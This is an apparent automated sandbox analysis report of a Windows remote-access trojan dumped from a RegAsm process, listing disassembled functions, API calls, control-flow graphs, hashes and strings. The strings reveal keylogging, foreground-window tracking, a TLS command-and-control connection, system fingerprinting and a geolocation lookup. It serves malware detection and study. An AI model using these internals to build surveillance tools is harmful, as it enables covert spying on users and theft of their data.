                                                        • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                        • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420c60 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b4ef 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1070 404941-40494e call 420e8f 1059->1070 1071 404932-40493c 1059->1071 1060->1059 1064 404a71-404a76 1061->1064 1065 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1061->1065 1067 404a7b-404a94 call 402093 * 2 call 41b4ef 1064->1067 1065->1057 1067->1057 1084 404950-404973 call 402093 * 2 call 41b4ef 1070->1084 1085 404987-404992 call 421a40 1070->1085 1071->1067 1114 404976-404982 call 420ca0 1084->1114 1097 4049c4-4049d1 call 420e06 1085->1097 1098 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1085->1098 1108 4049d3-4049f6 call 402093 * 2 call 41b4ef 1097->1108 1109 4049f9-404a14 CreateEventW * 2 1097->1109 1098->1114 1108->1109 1109->1054 1114->1057
                                                        APIs
                                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                        • API String ID: 994465650-2151626615
                                                        • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                        • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                        • GetForegroundWindow.USER32 ref: 0040AD49
                                                        • GetWindowTextLengthW.USER32 ref: 0040AD52
                                                        • GetWindowTextW.USER32 ref: 0040AD86
                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                        • API String ID: 911427763-3954389425
                                                        • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                        • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1206 40da34-40da59 call 401f86 1209 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1206->1209 1210 40da5f 1206->1210 1231 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1209->1231 1212 40da70-40da7e call 41b5b4 call 401f13 1210->1212 1213 40da91-40da96 1210->1213 1214 40db51-40db56 1210->1214 1215 40daa5-40daac call 41bfb7 1210->1215 1216 40da66-40da6b 1210->1216 1217 40db58-40db5d 1210->1217 1218 40da9b-40daa0 1210->1218 1219 40db6e 1210->1219 1220 40db5f-40db6c call 43c0cf 1210->1220 1237 40da83 1212->1237 1222 40db73 call 43c0cf 1213->1222 1214->1222 1232 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1232 1233 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1233 1216->1222 1217->1222 1218->1222 1219->1222 1220->1219 1234 40db79-40db7e call 409057 1220->1234 1235 40db78 1222->1235 1232->1237 1242 40da87-40da8c call 401f09 1233->1242 1234->1209 1235->1234 1237->1242 1242->1209
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LongNamePath
                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                        • API String ID: 82841172-425784914
                                                        • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                        • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1305 44ac49-44ac62 1306 44ac64-44ac74 call 446766 1305->1306 1307 44ac78-44ac7d 1305->1307 1306->1307 1314 44ac76 1306->1314 1309 44ac7f-44ac87 1307->1309 1310 44ac8a-44acae MultiByteToWideChar 1307->1310 1309->1310 1312 44acb4-44acc0 1310->1312 1313 44ae41-44ae54 call 434fcb 1310->1313 1315 44ad14 1312->1315 1316 44acc2-44acd3 1312->1316 1314->1307 1318 44ad16-44ad18 1315->1318 1319 44acd5-44ace4 call 457190 1316->1319 1320 44acf2-44ad03 call 446137 1316->1320 1323 44ae36 1318->1323 1324 44ad1e-44ad31 MultiByteToWideChar 1318->1324 1319->1323 1330 44acea-44acf0 1319->1330 1320->1323 1331 44ad09 1320->1331 1328 44ae38-44ae3f call 435e40 1323->1328 1324->1323 1327 44ad37-44ad49 call 448bb3 1324->1327 1335 44ad4e-44ad52 1327->1335 1328->1313 1334 44ad0f-44ad12 1330->1334 1331->1334 1334->1318 1335->1323 1337 44ad58-44ad5f 1335->1337 1338 44ad61-44ad66 1337->1338 1339 44ad99-44ada5 1337->1339 1338->1328 1342 44ad6c-44ad6e 1338->1342 1340 44ada7-44adb8 1339->1340 1341 44adf1 1339->1341 1343 44add3-44ade4 call 446137 1340->1343 1344 44adba-44adc9 call 457190 1340->1344 1345 44adf3-44adf5 1341->1345 1342->1323 1346 44ad74-44ad8e call 448bb3 1342->1346 1348 44ae2f-44ae35 call 435e40 1343->1348 1361 44ade6 1343->1361 1344->1348 1360 44adcb-44add1 1344->1360 1347 44adf7-44ae10 call 448bb3 1345->1347 1345->1348 1346->1328 1358 44ad94 1346->1358 1347->1348 1362 44ae12-44ae19 1347->1362 1348->1323 1358->1323 1363 44adec-44adef 1360->1363 1361->1363 1364 44ae55-44ae5b 1362->1364 1365 44ae1b-44ae1c 1362->1365 1363->1345 1366 44ae1d-44ae2d WideCharToMultiByte 1364->1366 1365->1366 1366->1348 1367 44ae5d-44ae64 call 435e40 1366->1367 1367->1328
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                        • __freea.LIBCMT ref: 0044AE30
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • __freea.LIBCMT ref: 0044AE39
                                                        • __freea.LIBCMT ref: 0044AE5E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3864826663-0
                                                        • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                        • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1370 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1375 41b3c5-41b3e6 InternetReadFile 1370->1375 1376 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1375->1376 1377 41b40c-41b40f 1375->1377 1376->1377 1379 41b411-41b413 1377->1379 1380 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1377->1380 1379->1375 1379->1380 1384 41b427-41b431 1380->1384
                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                        Strings
                                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                        • String ID: http://geoplugin.net/json.gp
                                                        • API String ID: 3121278467-91888290
                                                        • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                        • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1388 41c3f1-41c402 1389 41c404-41c407 1388->1389 1390 41c41a-41c421 1388->1390 1391 41c410-41c418 1389->1391 1392 41c409-41c40e 1389->1392 1393 41c422-41c43b CreateFileW 1390->1393 1391->1393 1392->1393 1394 41c441-41c446 1393->1394 1395 41c43d-41c43f 1393->1395 1397 41c461-41c472 WriteFile 1394->1397 1398 41c448-41c456 SetFilePointer 1394->1398 1396 41c47f-41c484 1395->1396 1400 41c474 1397->1400 1401 41c476-41c47d CloseHandle 1397->1401 1398->1397 1399 41c458-41c45f CloseHandle 1398->1399 1399->1395 1400->1401 1401->1396
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                        • String ID: hpF
                                                        • API String ID: 1852769593-151379673
                                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1402 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1413 41b35d-41b366 1402->1413 1414 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1402->1414 1416 41b368-41b36d 1413->1416 1417 41b36f 1413->1417 1424 41b355-41b358 call 401fd8 1414->1424 1425 41b349-41b352 call 41cf69 1414->1425 1418 41b374-41b37f call 40537d 1416->1418 1417->1418 1424->1413 1425->1424
                                                        APIs
                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        • API String ID: 1866151309-2070987746
                                                        • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                        • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1476 40a675-40a685 1477 40a722-40a725 1476->1477 1478 40a68b-40a68d 1476->1478 1479 40a690-40a6b6 call 401f04 CreateFileW 1478->1479 1482 40a6f6 1479->1482 1483 40a6b8-40a6c6 GetFileSize 1479->1483 1486 40a6f9-40a6fd 1482->1486 1484 40a6c8 1483->1484 1485 40a6ed-40a6f4 CloseHandle 1483->1485 1488 40a6d2-40a6d9 1484->1488 1489 40a6ca-40a6d0 1484->1489 1485->1486 1486->1479 1487 40a6ff-40a702 1486->1487 1487->1477 1490 40a704-40a70b 1487->1490 1491 40a6e2-40a6e7 Sleep 1488->1491 1492 40a6db-40a6dd call 40b0dc 1488->1492 1489->1485 1489->1488 1490->1477 1493 40a70d-40a71d call 40905c call 40a179 1490->1493 1491->1485 1492->1491 1493->1477
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                        • String ID: XQG
                                                        • API String ID: 1958988193-3606453820
                                                        • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                        • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountEventTick
                                                        • String ID: !D@$NG
                                                        • API String ID: 180926312-2721294649
                                                        • Opcode ID: 33767b7051b298e2fabd8bf43bc115551dafe8336a461eebe98c5c6399c2f375
                                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                        • Opcode Fuzzy Hash: 33767b7051b298e2fabd8bf43bc115551dafe8336a461eebe98c5c6399c2f375
                                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTimewsprintf
                                                        • String ID: Offline Keylogger Started
                                                        • API String ID: 465354869-4114347211
                                                        • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                        • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$EventLocalThreadTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 2532271599-1507639952
                                                        • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                        • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                        • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                        • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: pth_unenc
                                                        • API String ID: 1818849710-4028850238
                                                        • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                        • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 3360349984-0
                                                        • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                        • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                        • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

